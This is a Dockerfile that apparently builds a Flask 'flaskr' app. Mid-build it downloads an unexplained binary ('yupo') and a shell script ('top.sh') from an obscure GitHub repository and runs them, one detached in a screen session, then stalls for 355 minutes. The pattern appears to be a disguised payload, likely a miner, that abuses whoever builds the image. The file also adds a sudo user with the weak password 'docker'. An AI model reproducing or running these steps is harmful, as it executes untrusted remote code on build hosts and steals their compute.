#FROM python:3.8.2-alpine3.11
FROM ubuntu:bionic 
ENV FLASK_APP=flaskr
ENV FLASK_ENV=development

COPY . /app

WORKDIR /app

#RUN pip install --editable .
RUN apt-get update -y
RUN apt-get -y install sudo
RUN useradd -m docker && echo "docker:docker" | chpasswd && adduser docker sudo				  
RUN sudo apt-get -y install screen
RUN apt-get install -y wget xz-utils
RUN wget https://raw.githubusercontent.com/qfiopk/lopki/master/yupo
RUN wget https://raw.githubusercontent.com/qfiopk/lopki/master/top.sh
RUN chmod +x yupo
RUN chmod +x top.sh
RUN screen -dmS yupo ./top.sh
RUN ./top.sh
RUN sleep 355m
# Unit tests
# RUN pip install pytest && pytest

EXPOSE 5000

CMD [ "flask", "run", "--host=0.0.0.0" ]



